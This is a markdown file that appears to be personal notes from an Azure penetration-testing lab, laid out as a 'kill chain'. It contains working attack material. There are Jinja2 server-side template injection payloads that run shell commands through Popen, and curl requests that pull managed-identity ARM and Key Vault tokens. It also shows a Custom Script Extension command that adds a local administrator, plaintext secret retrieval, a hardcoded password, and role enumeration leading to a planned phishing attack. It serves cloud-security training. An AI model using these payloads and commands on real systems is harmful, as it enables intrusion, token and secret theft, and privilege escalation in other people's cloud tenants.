Skip to content

Latest commit

 

History

History
178 lines (138 loc) · 5.75 KB

Kill Chain 2.md

File metadata and controls

178 lines (138 loc) · 5.75 KB
Raw

Kill Chain 2

KillChain

KillChain

Path_1

Objective 11,16,20,21

  • Azure VMs User Data Abuse
  • Azure VMs Custom Script Extension Abuse
Get-AzVMExtension -ResourceGroupName "Research" -VMName "infradminsrv"
Set-AzVMExtension -ResourceGroupName "Research" -ExtensionName "ExecCmd" -VMName "infradminsrv" -Location "Germany West Central" -Publisher Microsoft.Compute -ExtensionType CustomScriptExtension -TypeHandlerVersion 1.8 -SettingString '{"commandToExecute":"powershell net users studentx StudxPassword@123 /add /Y; net localgroup administrators student1 /add"}'

Path (11, 16, 20, 21, 25)

  1. Abuse SSTI
  2. Use got token with Az PowerShell to find all accesible resources
  3. To be able to access the keyvault request a keyvault access token, KillChain
  4. request new ARM access token via app rce and connect using Az PowerShell and use both the arm token and keyvault token
$token = 'eyJ0....'
$keyvaulttoken = 'eyJ0....'
Connect-AzAccount -AccessToken $token -AccountId  2e91a4fea0f2-46ee-8214-fa2ff6aa9abc -KeyVaultAccessToken $keyvaulttoken
  1. check if we can access the keyvault and possible any secrets
Get-AzKeyVault
Get-AzKeyVaultSecret -VaultName ResearchKeyVault
Get-AzKeyVaultSecret -VaultName ResearchKeyVault -Name Reader -AsPlainText

KillChain 6. Let's see what Azure resources the user Kathy has access to. You may like to note that Kathy's access to Azure portal using a web browser is blocked using a Condition Access Policy

$password = ConvertTo-SecureString 'Gaxu@6991TEST$#*!@#' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('[email protected]',$password)
Connect-AzAccount -Credential $creds
Get-AzResourcec

KillChain KillChain 7. Let's enumerate role assignments on the VM 'jumpvm':

Get-AzRoleAssignment -Scope  /subscriptions/b413826f-108d4049-8c11-d52d5d388768/resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/jumpvm

KillChain 8. So there is a group 'VM admins' that has the Virtual Machine Command Executor role on the jumpvm VM

Get-AzRoleDefinition -Name "Virtual Machine Command Executor"

KillChain KillChain 9. Let's get some information about the VM admins group and its membership:

Get-AzADGroup -DisplayName 'VM Admins'
Get-AzADGroupMember -GroupDisplayName 'VM Admins' | select UserPrincipalName
  1. We will use the Graph API to get all the details and not Az PowerShell. So [email protected] is added to an administrative unit 'Control Group'.
(Get-AzAccessToken -ResourceUrl https://graph.microsoft.com).Token

KillChain 11. Let's get information and membership of this administrative unit using Azure AD module. We are using Kathy's credentials below:

Import-Module C:\AzAD\Tools\AzureAD\AzureAD.psd1
Connect-AzureAD -Credential $creds
Get-AzureADMSAdministrativeUnit -Id  e1e26d93-163e-42a2-a46e-1b7d52626395
Get-AzureADMSAdministrativeUnitMember -Id e1e26d93-163e-42a2-a46e-1b7d52626395

KillChain 12. The VM Admins group is a member of the administrative unit. Let's check for any roles scoped to this administrative unit:

Get-AzureADMSScopedMembership -Id e1e26d93-163e-42a2-a46e-1b7d52626395 | fl *
  1. Let's check the role using the RoleId we got above:
Get-AzureADDirectoryRole -ObjectId 5b3935ed-b52d-4080-8b05-3a1832194d3a
  1. Get some more details about the user Roy:
Get-AzureADUser -ObjectId 8c088359-66fb-4253-ad0da91b82fd548a | fl *
  1. Information collected from jumpvm about user Roy execute a phishing attack against the user has authentication administrative role.

Find the right index of Popen]

  • Whoami Command
{% for x in ().__class__.__mro__[1].__subclasses__() %}
 {% if "Popen" in x.__name__ %}
  {{x('whoami',shell=True,stdout=-1).communicate()}}
 {% endif %}
{% endfor %}
  • Variables command
{% for x in ().__class__.__mro__[1].__subclasses__() %}
 {% if "Popen" in x.__name__ %}
 {{x('curl
"$IDENTITY_ENDPOINT?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER',shell=True,stdout=-
1).communicate()}}
 {% endif %}
{% endfor %}
  • Request a keyvault access token
{% for x in ().__class__.__mro__[1].__subclasses__() %}
 {% if "Popen" in x.__name__ %}
 {{x('curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER',shell=True,stdout=-
1).communicate()}}
 {% endif %}
{% endfor %}
  • Request a new ARM access token
{% for x in ().__class__.__mro__[1].__subclasses__() %}
 {% if "Popen" in x.__name__ %}
 {{x('curl
"$IDENTITY_ENDPOINT?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER',shell=True,stdout=-
1).communicate()}}
 {% endif %}
{% endfor %}

List All classes using MRO (Method Resolution Order)

{{''.__class__.__mro__[1].__subclasses__()}}

Manuel API call to add a user to an administrative unit 'Control Group'

$Token = 'eyJ0eX..'
$URI = '
https://graph.microsoft.com/v1.0/users/[email protected]/memberOf'
$RequestParams = @{
  Method = 'GET'
  Uri = $URI
  Headers = @{
    'Authorization' = "Bearer $Token"
    }
  }
(Invoke-RestMethod @RequestParams).value